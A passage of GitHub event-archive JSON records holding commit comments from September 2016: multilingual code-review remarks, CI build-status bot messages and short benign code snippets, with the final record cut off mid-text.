{"id":"4565631933","type":"CommitCommentEvent","actor":{"login":"petebachant"},"repo":{"name":"HomelessAnimalProject/HomelessAnimalProject.github.io"},"payload":{"comment":{"id":19029426,"position":4,"line":9,"path":"index.html","commit_id":"acddc32b062a10e878171f98340b1b0ecea1fd03","created_at":"2016-09-15T01:34:23Z","updated_at":"2016-09-15T01:34:23Z","body":"Put this line back. It uses the site name and description in the `_config.yml` file."}},"created_at":"2016-09-15T01:34:23Z"}
{"id":"4565636288","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19029438,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-15T01:36:14Z","updated_at":"2016-09-15T01:36:14Z","body":" blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px #715FFA solid !important; padding-left:1ex !important; background-color:white !important; } Is working\n\n\nSent from Yahoo Mail for iPad\n\n\nOn Wednesday, September 14, 2016, 5:32 AM, Valentyn Kolesnikov <notifications@github.com> wrote:\n\n\nYou may tro import HttpClient from package com.github.javadev.undescriptive.client.\n\nKind regsrds, Valentyn\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n  \n \n\n "}},"created_at":"2016-09-15T01:36:14Z"}
{"id":"4565640558","type":"CommitCommentEvent","actor":{"login":"NathanielTurner"},"repo":{"name":"turbolinks/turbolinks-ios"},"payload":{"comment":{"id":19029452,"position":null,"line":null,"path":null,"commit_id":"e179c21e06984f0c796c7be2a6d67f83114f9e64","created_at":"2016-09-15T01:37:53Z","updated_at":"2016-09-15T01:37:53Z","body":"I get an error pertaining to this commit stating initializer for conditional binding must have optional type, not 'UIView. I included turbolinks using cocoapods. The error goes away if I undo this commit in my code, but when i build the app freezes when calling the visit url function. I am not sure if its because of this. "}},"created_at":"2016-09-15T01:37:53Z"}
{"id":"4565641103","type":"CommitCommentEvent","actor":{"login":"Oracleman200"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":19029453,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-15T01:38:06Z","updated_at":"2016-09-15T01:38:06Z","body":"Is working now"}},"created_at":"2016-09-15T01:38:06Z"}
{"id":"4565644890","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029463,"position":11,"line":11,"path":"src/Board.cpp","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:39:33Z","updated_at":"2016-09-15T01:39:33Z","body":"El orden de inicialización de estos atributos debe ser el mismo que el que están declarados en el .h."}},"created_at":"2016-09-15T01:39:33Z"}
{"id":"4565646462","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029467,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-15T01:40:09Z","updated_at":"2016-09-15T01:40:09Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1780 of 1780 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T01:40:09Z"}
{"id":"4565647788","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029472,"position":41,"line":41,"path":"src/Board.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:40:35Z","updated_at":"2016-09-15T01:40:35Z","body":"Esto no está muy bueno, hay un vector de vectores de CuadritoTetris. Me parece que es una estructura de datos complicada y poco conveniente."}},"created_at":"2016-09-15T01:40:35Z"}
{"id":"4565649296","type":"CommitCommentEvent","actor":{"login":"Manojhaki"},"repo":{"name":"Manojhaki/hello-world"},"payload":{"comment":{"id":19029477,"position":null,"line":null,"path":null,"commit_id":"6c9d741f60865f87700e5f8a99ecb8614a4e2a1e","created_at":"2016-09-15T01:41:08Z","updated_at":"2016-09-15T01:41:08Z","body":"this is where you make comment of each version changed"}},"created_at":"2016-09-15T01:41:08Z"}
{"id":"4565649328","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029478,"position":30,"line":30,"path":"src/CuadtritoTetris.cpp","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:41:09Z","updated_at":"2016-09-15T01:41:09Z","body":"Poné el nombre de la imagen en una constante global."}},"created_at":"2016-09-15T01:41:09Z"}
{"id":"4565651941","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029483,"position":8,"line":8,"path":"src/Tetrominio.cpp","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:42:09Z","updated_at":"2016-09-15T01:42:09Z","body":"Esto no tiene muy buena pinta, es una estructura muy complicada. Por favor, pensá otra opción."}},"created_at":"2016-09-15T01:42:09Z"}
{"id":"4565652943","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029484,"position":78,"line":78,"path":"src/Tetrominio.cpp","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:42:32Z","updated_at":"2016-09-15T01:42:32Z","body":"Magic Number"}},"created_at":"2016-09-15T01:42:32Z"}
{"id":"4565653093","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19029486,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T01:42:36Z","updated_at":"2016-09-15T01:42:36Z","body":"I am idiot I think. I try this - http://pastebin.com/fF3kAmNk\r\nAnd I have this - http://imgur.com/a/24RrI"}},"created_at":"2016-09-15T01:42:36Z"}
{"id":"4565654105","type":"CommitCommentEvent","actor":{"login":"kennadyj"},"repo":{"name":"kennadyj/Buzz"},"payload":{"comment":{"id":19029487,"position":1,"line":1,"path":".gitignore","commit_id":"e091ee0090a1ccc5f978cd434b03796ca9b7d482","created_at":"2016-09-15T01:42:58Z","updated_at":"2016-09-15T01:42:58Z","body":"bin/"}},"created_at":"2016-09-15T01:42:58Z"}
{"id":"4565654850","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19029488,"position":null,"line":null,"path":null,"commit_id":"72a4aad28dce9fc7b0f840329b3f8a77e685f372","created_at":"2016-09-15T01:43:15Z","updated_at":"2016-09-15T01:43:15Z","body":"う～ん...\r\nこのタイトルだけだと、とても広範囲にわたる修正をしているように読めませんか？\r\n`lib: Fix for bug of port status`\r\n\r\nまた、コミット文では\r\n　「このパッチでバグが組み込まれました」\r\nとだけ説明していて、\r\n　「どんなバグか？」\r\nはほとんど説明できていないと思います。\r\nRyu-devel でやり取りした経歴も無いバグですので、\r\nある程度説明は必要かと思います。\r\n\r\n\r\nどういうか、ですが、このパッチは大きく下記の２件ではないでしょうか？\r\n\r\n1. Python2/3 互換の問題(MAC の比較)\r\n2. PortStatus の問題(前回状態の保持)\r\n\r\n```\r\nstplib: Fix to compare MAC address and Bridge ID\r\n\r\ncmp() func was introduced for Python 3 compatibility before,\r\nbut this implementation is not enough, because a MAC address\r\ncan not be compared with a Bridge ID (integer value) by com() func.\r\n\r\nThis patch fixes to convert the MAC address into an integer value\r\nbefore comparing with Bridge ID and fixes this problem.\r\n```\r\n\r\n```\r\nstplib: Fix to store current OFPPort status\r\n\r\nCurrently, stplib compares the status of OFPPortStatus message with\r\nthat of Datapath instance, but this comparison returns always \"equal\",\r\nso stplib fails to get the correct port status.\r\n\r\nThis patch fixes to store the current port status and to compare the\r\nnew status with the stored status.\r\n```"}},"created_at":"2016-09-15T01:43:15Z"}
{"id":"4565655681","type":"CommitCommentEvent","actor":{"login":"boingoing"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029489,"position":494,"line":610,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T01:43:34Z","updated_at":"2016-09-15T01:43:34Z","body":"Why do we need to create a new HandleScope? Is it because the throw is global?"}},"created_at":"2016-09-15T01:43:34Z"}
{"id":"4565656167","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19029490,"position":59,"line":426,"path":"ryu/lib/stplib.py","commit_id":"72a4aad28dce9fc7b0f840329b3f8a77e685f372","created_at":"2016-09-15T01:43:43Z","updated_at":"2016-09-15T01:43:43Z","body":"このインデント追加は余計ではないでしょうか？"}},"created_at":"2016-09-15T01:43:43Z"}
{"id":"4565656307","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029492,"position":37,"line":37,"path":"src/Tetrominio.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:43:46Z","updated_at":"2016-09-15T01:43:46Z","body":"Poner el código de esta funcion en el .cpp. Estás haciendo un poco mas que setear un valor. Por otro lado, por que un set devuelve un valor?"}},"created_at":"2016-09-15T01:43:46Z"}
{"id":"4565656381","type":"CommitCommentEvent","actor":{"login":"tbluemel"},"repo":{"name":"Strapazzon/rtf.js"},"payload":{"comment":{"id":19029493,"position":null,"line":null,"path":null,"commit_id":"d4d0d0063c2a0823b80255e753c8f409cb9d2285","created_at":"2016-09-15T01:43:48Z","updated_at":"2016-09-15T01:43:48Z","body":"Removing the copyright notice is a violation of the MIT license.  Please add it back in!"}},"created_at":"2016-09-15T01:43:48Z"}
{"id":"4565656925","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029496,"position":35,"line":35,"path":"src/Tetrominio.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:44:01Z","updated_at":"2016-09-15T01:44:01Z","body":"No me convence mucho esta estructura de datos."}},"created_at":"2016-09-15T01:44:01Z"}
{"id":"4565656943","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029497,"position":null,"line":null,"path":null,"commit_id":"55ac1912c41d61e56127a5e3dc310bed3594da79","created_at":"2016-09-15T01:44:01Z","updated_at":"2016-09-15T01:44:01Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T01:44:01Z"}
{"id":"4565660385","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029506,"position":13,"line":13,"path":"src/Tetrominio.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:45:26Z","updated_at":"2016-09-15T01:45:26Z","body":"Esto esta bueno, sin embargo, creo que puede ser mucho mas útil hacer que el Tetromino sea genérico, y tengas una implementación de cada tetromino por separado, y no un Tetromino que pueda ser todos a la vez. Esto es poco escalable."}},"created_at":"2016-09-15T01:45:26Z"}
{"id":"4565661015","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029507,"position":25,"line":25,"path":"src/Tetrominio.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:45:42Z","updated_at":"2016-09-15T01:45:42Z","body":"destructor debe ser virtual"}},"created_at":"2016-09-15T01:45:42Z"}
{"id":"4565662043","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19029513,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T01:46:08Z","updated_at":"2016-09-15T01:46:08Z","body":"hmmm, won't this break stuff like `f(multiReturnCall())`?"}},"created_at":"2016-09-15T01:46:08Z"}
{"id":"4565662581","type":"CommitCommentEvent","actor":{"login":"diegolv9999a"},"repo":{"name":"diegolv9999a/PracticaPeronal"},"payload":{"comment":{"id":19029514,"position":5,"line":17,"path":"appJava/src/appjava/modelo/Usuario.java","commit_id":"97426c4bad7d5874f7554ef89ef1c3f224485608","created_at":"2016-09-15T01:46:20Z","updated_at":"2016-09-15T01:46:20Z","body":"nuevo hecho actualmente"}},"created_at":"2016-09-15T01:46:20Z"}
{"id":"4565663701","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029516,"position":45,"line":45,"path":"src/Tetrominio.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:46:46Z","updated_at":"2016-09-15T01:46:46Z","body":"Está bueno usar containers de stl, sin embargo, esto puede ser demasiado para Cuadrito Tetris. Probá usar arreglos comunes."}},"created_at":"2016-09-15T01:46:46Z"}
{"id":"4565663850","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19029518,"position":41,"line":82,"path":"join/check.php","commit_id":"77b308d519d1a6b14ddd28f89e9e197c11a3057f","created_at":"2016-09-15T01:46:49Z","updated_at":"2016-09-15T01:46:49Z","body":"ここはsprintf使わないで教科書に従おう"}},"created_at":"2016-09-15T01:46:49Z"}
{"id":"4565665818","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029522,"position":9,"line":9,"path":"src/Surface.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:47:36Z","updated_at":"2016-09-15T01:47:36Z","body":"Agregar destructor virtual"}},"created_at":"2016-09-15T01:47:36Z"}
{"id":"4565667054","type":"CommitCommentEvent","actor":{"login":"gbrgarom"},"repo":{"name":"gbrgarom/gbrTestProject"},"payload":{"comment":{"id":19029524,"position":null,"line":null,"path":null,"commit_id":"44b85e1b3340678d395766a647589dd00e34ae56","created_at":"2016-09-15T01:48:03Z","updated_at":"2016-09-15T01:48:03Z","body":"99999"}},"created_at":"2016-09-15T01:48:03Z"}
{"id":"4565667157","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029525,"position":14,"line":14,"path":"src/Renderer.h","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:48:05Z","updated_at":"2016-09-15T01:48:05Z","body":"Destructor virtual"}},"created_at":"2016-09-15T01:48:05Z"}
{"id":"4565667411","type":"CommitCommentEvent","actor":{"login":"gbrgarom"},"repo":{"name":"gbrgarom/gbrTestProject"},"payload":{"comment":{"id":19029527,"position":2,"line":5,"path":"folder001/test003.html","commit_id":"44b85e1b3340678d395766a647589dd00e34ae56","created_at":"2016-09-15T01:48:11Z","updated_at":"2016-09-15T01:48:11Z","body":"9999"}},"created_at":"2016-09-15T01:48:11Z"}
{"id":"4565668423","type":"CommitCommentEvent","actor":{"login":"gbrgarom"},"repo":{"name":"gbrgarom/gbrTestProject"},"payload":{"comment":{"id":19029531,"position":6,"line":8,"path":"folder001/test003.html","commit_id":"44b85e1b3340678d395766a647589dd00e34ae56","created_at":"2016-09-15T01:48:34Z","updated_at":"2016-09-15T01:48:34Z","body":"ここちょっと変"}},"created_at":"2016-09-15T01:48:34Z"}
{"id":"4565669724","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19029532,"position":5,"line":29,"path":"app/Translator.js","commit_id":"871b3e8b06ef60ad492b80ca7315f250d6ed707c","created_at":"2016-09-15T01:49:07Z","updated_at":"2016-09-15T01:49:07Z","body":":+1: "}},"created_at":"2016-09-15T01:49:07Z"}
{"id":"4565669949","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19029533,"position":3,"line":3,"path":"join/check.php","commit_id":"77b308d519d1a6b14ddd28f89e9e197c11a3057f","created_at":"2016-09-15T01:49:12Z","updated_at":"2016-09-15T01:49:12Z","body":"これは最後に書いて説明する\r\n```\r\nif (!isset($_SESSION['join'])) {\r\n  header('Location: index.php');\r\n  exit();\r\n}\r\n```"}},"created_at":"2016-09-15T01:49:12Z"}
{"id":"4565670132","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19029534,"position":null,"line":null,"path":null,"commit_id":"871b3e8b06ef60ad492b80ca7315f250d6ed707c","created_at":"2016-09-15T01:49:17Z","updated_at":"2016-09-15T01:49:17Z","body":"Great!"}},"created_at":"2016-09-15T01:49:17Z"}
{"id":"4565670598","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029535,"position":26,"line":26,"path":"src/main.cpp","commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:49:27Z","updated_at":"2016-09-15T01:49:27Z","body":"Magic Numbers"}},"created_at":"2016-09-15T01:49:27Z"}
{"id":"4565675476","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029546,"position":null,"line":null,"path":null,"commit_id":"55ac1912c41d61e56127a5e3dc310bed3594da79","created_at":"2016-09-15T01:51:20Z","updated_at":"2016-09-15T01:51:20Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T01:51:20Z"}
{"id":"4565676401","type":"CommitCommentEvent","actor":{"login":"mburnside999"},"repo":{"name":"mburnside999/mynodestarter"},"payload":{"comment":{"id":19029549,"position":null,"line":null,"path":null,"commit_id":"9966f5eff7543f5a99eb79c1a56ea7df6c105e69","created_at":"2016-09-15T01:51:43Z","updated_at":"2016-09-15T01:51:43Z","body":"ok"}},"created_at":"2016-09-15T01:51:43Z"}
{"id":"4565677917","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19029550,"position":null,"line":null,"path":null,"commit_id":"d19fea86295f19006ecdf59336f838226ccc1e82","created_at":"2016-09-15T01:52:21Z","updated_at":"2016-09-15T01:52:21Z","body":"```\r\nJust for information, the source files for application of Ryu-Book\r\nwill Integrate as for OpenFlow1.3.\r\n```\r\nこのコミットコメントは必要なのでしょうか？\r\n下記のように英文法で怪しいところがありますが、\r\nそれを押してでも書きたかった内容は何でしょうか？\r\n\r\n- 「ちなみに」という文言は「FYI」とよく表現されているようです。\r\n- 「Integrate」の部分で、大文字始まりとなっていること、また、\r\n他動詞なのに目的語（何を統合するか、の「何」）が無いです。"}},"created_at":"2016-09-15T01:52:21Z"}
{"id":"4565678145","type":"CommitCommentEvent","actor":{"login":"tbodt"},"repo":{"name":"rollbar/pyrollbar"},"payload":{"comment":{"id":19029551,"position":null,"line":null,"path":null,"commit_id":"075ff69577892831f48e145830334bd4e3232c40","created_at":"2016-09-15T01:52:27Z","updated_at":"2016-09-15T01:52:27Z","body":"Why? Whatever happened to duck typing?"}},"created_at":"2016-09-15T01:52:27Z"}
{"id":"4565680542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029555,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T01:53:21Z","updated_at":"2016-09-15T01:53:21Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T01:53:21Z"}
{"id":"4565680605","type":"CommitCommentEvent","actor":{"login":"KrayzeeKev"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":19029556,"position":null,"line":null,"path":null,"commit_id":"8c04a8cb3ebc038b062e9cd544a8cdd513e9c459","created_at":"2016-09-15T01:53:23Z","updated_at":"2016-09-15T01:53:23Z","body":"LOL. Here I am trying to work out why my patch wouldn't merge and it's because you've done it for me. My original patch was half-baked. This fixes it.  My version of _getTime (which I called _getTimeFields) returned an object so you could go: now = this._getTimeFields() and then use \"this._month < now._month\" without all the extra function calls.\r\n\r\nI'm happy to patch that version back if anybody is interested. Here's my function:\r\nDailyRotateFile.prototype._getTimeFields = function () {\r\n  var now = new Date();\r\n  return this.localTime ? {\r\n    _year: now.getFullYear(),\r\n    _month: now.getMonth(),\r\n    _date: now.getDate(),\r\n    _hour: now.getHours(),\r\n    _minute: now.getMinutes(),\r\n    _weekday: weekday[now.getDay()]\r\n  } : {\r\n    _year: now.getUTCFullYear(),\r\n    _month: now.getUTCMonth(),\r\n    _date: now.getUTCDate(),\r\n    _hour: now.getUTCHours(),\r\n    _minute: now.getUTCMinutes(),\r\n    _weekday: weekday[now.getUTCDay()]\r\n  };\r\n};\r\n"}},"created_at":"2016-09-15T01:53:23Z"}
{"id":"4565681089","type":"CommitCommentEvent","actor":{"login":"nolanlawson"},"repo":{"name":"healthonnet/hon-lucene-synonyms"},"payload":{"comment":{"id":19029558,"position":null,"line":null,"path":null,"commit_id":"c87fb8ced0abc9e19381a4843c964cf8473e8912","created_at":"2016-09-15T01:53:33Z","updated_at":"2016-09-15T01:53:33Z","body":":laugh:"}},"created_at":"2016-09-15T01:53:33Z"}
{"id":"4565681320","type":"CommitCommentEvent","actor":{"login":"willat8"},"repo":{"name":"OpenELEC/OpenELEC.tv"},"payload":{"comment":{"id":19029560,"position":10,"line":24,"path":"packages/addons/official/kodi-addons/peripheral.joystick/package.mk","commit_id":"59b34d7c11d96931c59c78b8894a8eccbccf6c61","created_at":"2016-09-15T01:53:39Z","updated_at":"2016-09-15T01:53:39Z","body":"This change is broken at least in RPi2 builds. Reverting to 6090a90 fixes."}},"created_at":"2016-09-15T01:53:39Z"}
{"id":"4565681341","type":"CommitCommentEvent","actor":{"login":"jtarchie"},"repo":{"name":"xinzweb/pullrequest-resource"},"payload":{"comment":{"id":19029561,"position":null,"line":null,"path":null,"commit_id":"ef9a2767fec3fc6378ba6af5b349a8d188d16478","created_at":"2016-09-15T01:53:39Z","updated_at":"2016-09-15T01:53:39Z","body":"1. The issue with the branch name was fixed.\r\n2. You don't need bash with `fly hijack`, it just default to bash. Please just use `fly hijack <..args..> sh`.\r\n3. Is the operation that expensive?\r\n\r\n@xinzweb, please see above. ^^^"}},"created_at":"2016-09-15T01:53:39Z"}
{"id":"4565682115","type":"CommitCommentEvent","actor":{"login":"designorant"},"repo":{"name":"caskroom/homebrew-cask"},"payload":{"comment":{"id":19029565,"position":null,"line":null,"path":null,"commit_id":"527d38d69d4887a7f86b5eb5b51885a2c1e0e703","created_at":"2016-09-15T01:53:58Z","updated_at":"2016-09-15T01:53:58Z","body":"I don't want to open an issue because it looks like Facebook's fault but just wanted to mention this doesn't work anymore. It looks like Facebook ditched the pkg versions, and moved onto zips."}},"created_at":"2016-09-15T01:53:58Z"}
{"id":"4565682767","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19029569,"position":6,"line":46,"path":"join/index.php","commit_id":"8ef877d3794280418375c57cb76ce374bfd08f40","created_at":"2016-09-15T01:54:13Z","updated_at":"2016-09-15T01:54:13Z","body":"・$_REQUESTは、$_GET、$_POST、$_COOKIEの値が入っている\r\n・$_GETでも$_REQUESTでもどちらでも"}},"created_at":"2016-09-15T01:54:13Z"}
{"id":"4565683243","type":"CommitCommentEvent","actor":{"login":"gortonz"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":19029572,"position":null,"line":null,"path":null,"commit_id":"18405c98ab7c7350bb03f5160345871a3cd8a7de","created_at":"2016-09-15T01:54:22Z","updated_at":"2016-09-15T01:54:22Z","body":"Why do we want to add the confirmed and lockable stuffs? Are we going to send email for the user account confirmation? \r\n\r\nBTW: you have created an new task for email setup. it will be better for those changes into that task"}},"created_at":"2016-09-15T01:54:22Z"}
{"id":"4565683574","type":"CommitCommentEvent","actor":{"login":"rbanton"},"repo":{"name":"cop1000/cop1000"},"payload":{"comment":{"id":19029573,"position":null,"line":null,"path":null,"commit_id":"f567e28838f4bb72ccfa3a093d2970cd6ed2f819","created_at":"2016-09-15T01:54:30Z","updated_at":"2016-09-15T01:54:30Z","body":"![image](https://cloud.githubusercontent.com/assets/21318198/18535873/cdbf0bb2-7ac5-11e6-9f89-d51231dce315.png)\r\n"}},"created_at":"2016-09-15T01:54:30Z"}
{"id":"4565686301","type":"CommitCommentEvent","actor":{"login":"gortonz"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":19029578,"position":null,"line":null,"path":null,"commit_id":"0e90e37a21b992a6d08435de6432d196317cb3dc","created_at":"2016-09-15T01:55:32Z","updated_at":"2016-09-15T01:55:32Z","body":"Just a bit confused, you said that we wanted this password controller and i just reverted it...."}},"created_at":"2016-09-15T01:55:32Z"}
{"id":"4565688597","type":"CommitCommentEvent","actor":{"login":"tbodt"},"repo":{"name":"rollbar/pyrollbar"},"payload":{"comment":{"id":19029585,"position":null,"line":null,"path":null,"commit_id":"075ff69577892831f48e145830334bd4e3232c40","created_at":"2016-09-15T01:56:25Z","updated_at":"2016-09-15T01:56:25Z","body":"Oh. #26."}},"created_at":"2016-09-15T01:56:25Z"}
{"id":"4565690163","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"DanielUranga/VeganTetris"},"payload":{"comment":{"id":19029588,"position":null,"line":null,"path":null,"commit_id":"f629cc3c38f484b109f1a09dd9ed6d6c21543901","created_at":"2016-09-15T01:57:04Z","updated_at":"2016-09-15T01:57:04Z","body":"Excelente!!! Muy bueno el código!!! Sin embargo me gustaría que revisemos la clase board que me parece que está muy sobre cargada de cosas, hay algunos problemas cohesión. La clase tetrimino también hay que repensarla. El main debería ser un poco mas pelado. He visto que no has usado herencia, ni polimorfismo. Tampoco has utilizado punteros (salvo los que sdl te impone) y referencias cuando creo que lo podrías haber hecho. En algunos casos has utilizado smart pointers, lo cual está bien, pero está mejor que te topes con los problemas comunes de manejo de punteros y puedas resolverlos. Es una buena oportunidad para trabajar con eso y experimentar problemas.\r\n\r\nMas allá de eso, está excelente!!! Adelante!!!"}},"created_at":"2016-09-15T01:57:04Z"}
{"id":"4565691899","type":"CommitCommentEvent","actor":{"login":"peterdd"},"repo":{"name":"ADOdb/ADOdb"},"payload":{"comment":{"id":19029593,"position":null,"line":null,"path":null,"commit_id":"27bcd7d09f25850ac6e77847a32f04e0012f4671","created_at":"2016-09-15T01:57:45Z","updated_at":"2016-09-15T01:57:45Z","body":"Yeah, my pull request for mysqli was a hack, but switching to 'dataProvider'  would probably break other db drivers usage in xmlschema03 platform attributes. There are at least 6 driver classes that have value 'native' for dataProvider. Other drivers use 'odbc' as dataProvider..\r\n\r\nThe naming 'databaseType', 'dataProvider'  and 'platform' and their values in the drivers feel a bit creepy to me. \r\n\r\nE.g. databaseType is mysqli for adodb driver mysqli, but dataProvider is mysql. My tiny brain would like to switch the values, because the databaseType in my logical understanding is always mysql, but the driver differs.. \r\n\r\nThis quick'ndirty script generates the table below showing the 'inconsistency' between different adodb drivers.\r\n\r\n```php\r\n<?php 